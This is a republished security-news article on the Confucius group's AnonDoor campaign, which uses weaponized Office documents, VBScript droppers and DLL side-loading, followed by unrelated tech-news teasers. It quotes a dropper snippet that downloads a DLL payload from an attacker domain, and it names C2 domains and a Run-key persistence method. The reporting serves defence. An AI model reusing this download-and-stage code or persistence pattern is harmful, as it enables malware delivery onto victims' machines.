κατασκευή ιστοσελίδων ρόδος

TECH - WEB DEVELOPMENT NEWS

Get the latest tech - web development news and analysis on industry around the world.

  • HOME
You are here: Home / INDUSTRY NEWS / Confucius Hacker Group Attacking Weaponizing Documents to Compromised Windows Systems With AnonDoor Malware
άμυνα
.

Confucius Hacker Group Attacking Weaponizing Documents to Compromised Windows Systems With AnonDoor Malware

03/10/2025

The Confucius hacker group, active since 2013, has recently escalated its operations by weaponizing malicious Office documents to compromise Windows endpoints with a new Python-based backdoor, dubbed AnonDoor.

Historically known for deploying document stealers such as WooperStealer, the threat actor has now shifted to a sophisticated multi-stage infection chain that leverages OLE-embedded scripts, VBScript droppers, PowerShell loaders, and scheduled tasks to achieve persistence and evade detection.

This evolution underscores the group’s commitment to refining its tradecraft and targeting high-value information across government and defense organizations in South Asia.

Confucius’ activities (Source – Fortinet)

Initial access is most commonly achieved through spear-phishing campaigns that deliver corrupted PPSX or DOCX attachments.

When unsuspecting users open these documents, they encounter a “Corrupted Page” prompt that conceals an embedded OLE object.

This object triggers a background fetch of a secondary document, mango44NX.doc, from a remote server.

Fortinet researchers noted that the CMD stub within slide1.xml.rels initiates a VBScript dropper hosted at greenxeonsr.info, marking the first deployment of AnonDoor in this campaign.

Upon execution, the VBScript dropper performs the following steps: it creates an MSXML2.XMLHTTP object to download a raw DLL payload, writes the binary to %LocalAppData%Mapistub.dll, and then stages execution via DLL side-loading.

The dropper also copies a legitimate executable to %AppData%Swom.exe and writes a registry key under HKCUSoftwareMicrosoftWindowsCurrentVersionRun to ensure the side-loaded DLL is launched on each login.

Download DLL (Source – Fortinet)

This strategy not only conceals the malicious binary within trusted processes but also provides robust persistence without generating conspicuous artifacts.

Infection Mechanism

The infection mechanism centers on leveraging a malicious Office payload to seamlessly introduce AnonDoor.

First, the document’s OLE object references an external VBScript hosted on greenxeonsr.info.

The script snippet below illustrates how the dropper leverages ADODB.Stream to save the downloaded bytes as a DLL:-

Set objXMLHTTP = CreateObject(“MSXML2.XMLHTTP”)
objXMLHTTP.Open “GET”, “https://greenxeonsr.info/Jsdfwejhrg.rko”, False
objXMLHTTP.Send
Set objStream = CreateObject(“ADODB.Stream”)
objStream.Type = 1 ‘ Binary
objStream.Open
objStream.Write objXMLHTTP.responseBody
objStream.SaveToFile WScript.Network.UserName & “Mapistub.dll”, 2
objStream.Close

Once the DLL is in place, the dropper invokes a reconstructed ShellExecute call to launch Swom.exe, which side-loads the DLL into memory.

The DLL subsequently reaches out to multiple C2 domains—cornfieldblue.info and hauntedfishtree.info—to retrieve further payloads, including the WooperStealer module and additional configuration files.

This multi-layered approach ensures that even if one stage is detected, subsequent payloads can be dynamically fetched, analyzed, and replaced, complicating forensic investigations.

By chaining document-based exploitation with obfuscated scripting and DLL side-loading, Confucius demonstrates advanced operational security and resilience against endpoint defenses.

Defensive teams should prioritize monitoring for anomalous OLE object behaviour, unexpected registry modifications, and unusual DLL loads within Office processes.

Integrating heuristics that detect atypical stream writes to user directories and enforcing strict network segmentation can help mitigate this emerging threat.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

Source: cybersecuritynews.com

Filed Under: INDUSTRY NEWS Tagged With: Source-10

5 ways mice can easily become more user-repairable

We use peripherals like keyboards and mice nearly every minute our PCs are awake, yet they seem to draw the short straw in terms of innovation. We’ve had a solid run with mechanical keyboards, where a vibrant community has pushed the industry from soldered, inaccessible boards to hot-swappable, endlessly customizable typing instruments. We’ve seen PC cases evolve with modularity and ease-of-access … [Read More...]

Anker's latest Prime charging devices are already 20 percent off

Anker's latest Prime charging devices are already on sale thanks to some handy coupons. The best deals include the laptop-compatible Prime Power Bank (26,250mAh, 300W), which is 20 percent off and down to $184 when you clip the on-page coupon on its Amazon page.This portable charger delivers a whopping 300W of total output between its two USB-C ports and single USB-A port. Anker says that, thanks … [Read More...]

This free browser extension was a game changer for my Dungeons & Dragons group

I love playing tabletop roleplaying games (TTRPGs), but virtual games just aren’t the same for me, especially when it comes to dice. There’s just something so satisfying about watching your d20 clatter around on the table (before probably landing on a nat one) that you usually miss out on with digital dice rolls in virtual games. Source: xda-developers.com … [Read More...]

If you can get past the terrible logo, Audacity 4 looks pretty great

Over 25 years it’s gone from a clean and simple audio editor, to a UX nightmare. Version 4 aims to fix that.Oct 5, 2025, 5:37 PM UTCTerrence O'Brien is the Verge’s weekend editor. He has over 18 years of experience, including 10 years as managing editor at Engadget.Rebrands rarely get much love. That backlash can be especially strong if you’re giving a facelift to a decades-old piece of software … [Read More...]

Uber and Lyft drivers in California are able to unionize under new law

California governor Gavin Newsom signed legislation on Friday that grants rideshare drivers in the state the right to unionize. It's the second state to grant organizing rights to rideshare drivers, who are independent contractors, following the passage of a similar law in Massachusetts in 2024. There are over 800,000 rideshare drivers in California, and the bill that was just signed into law … [Read More...]

This Roomba robot vacuum is on sale for $150 for Prime Day

Robot vacuums are great items to look for during events like October Prime Day. They're usually hundreds of dollars off, so you can save a ton if you're buying one as a gift or you want to upgrade an aging robovac you have at home already. One of the best deals this time around is on the iRobot Roomba 104, which is 40 percent off and on sale for only $150.This is a newer version of the unit that … [Read More...]

Marvel's Wolverine needed to feel different than Insomniac's Spider-Man games

Fans have been wanting to see anything from Insomniac Games' upcoming Wolverine for PlayStation 5. Following the massive leak for the company that revealed most of the planned game releases and concepts for their titles, many fans were wondering if they would have to wait longer before catching an official glimpse at what was coming next. But during the State of Play showcase for PlayStation in … [Read More...]

ICE is planning to create a surveillance team that hunts for leads on social media

The US Immigration and Customs Enforcement (ICE) has plans to build out a 24/7/365 surveillance team that focuses on scouring social media for case leads, as revealed in documents first discovered by Wired. According to public records, ICE has put out a request for information — which allows the agency to detail its preliminary scope of work to gauge any interest from contractors — that details … [Read More...]

OpenAI and Jony Ive may be struggling to figure out their AI device

OpenAI and Jony Ive face significant technical challenges as they work to develop a screen-less, AI-powered device, according to the Financial Times. Back in May, OpenAI acquired io, the device startup founded by the legendary Apple designer with OpenAI CEO Sam Altman, for $6.5 billion. At the time, Altman declared that Ive and his team would help the company “create a new generation of … [Read More...]

An old Xeon may use a lot of power, but it's not as slow as you might think

Contrary to what you may believe, home labs don’t require a lot of monetary investment. Depending on your requirements, you can put together a reliable containerization server using budget-friendly SBCs. Heck, if you’ve got a spare PC gathering dust, you can even arm it with a virtualization platform and turn it into a powerful home server. Source: xda-developers.com … [Read More...]

Tags

Source-1 Source-2 Source-3 Source-4 Source-5 Source-6 Source-7 Source-8 Source-9 Source-10 Source-12 Source-13 Source-15 Source-16

Tech Web Development News

This is a PERSONAL and PRIVATE WEBPAGE. Please leave this page. Contact me via email : admin@news-6.com about anything you would like to ask or problem.

Tech News

Disclaimer!
In every post is written below the original source of the post. Copyrights belong on their owners.

Web Development News

HOTELS – CRUISES – CARS – TRAVEL

Recent Posts

  • 5 ways mice can easily become more user-repairable
  • Anker's latest Prime charging devices are already 20 percent off
  • This free browser extension was a game changer for my Dungeons & Dragons group
  • If you can get past the terrible logo, Audacity 4 looks pretty great
  • Uber and Lyft drivers in California are able to unionize under new law

Technology - Seo

Categories

  • INDUSTRY NEWS

World Industry News

Privacy & Cookies: This site uses cookies.
To find out more, as well as how to remove or block these, see here: Our Cookie Policy
TECH - WEB DEVELOPMENT NEWS @ COPYRIGHTS 2023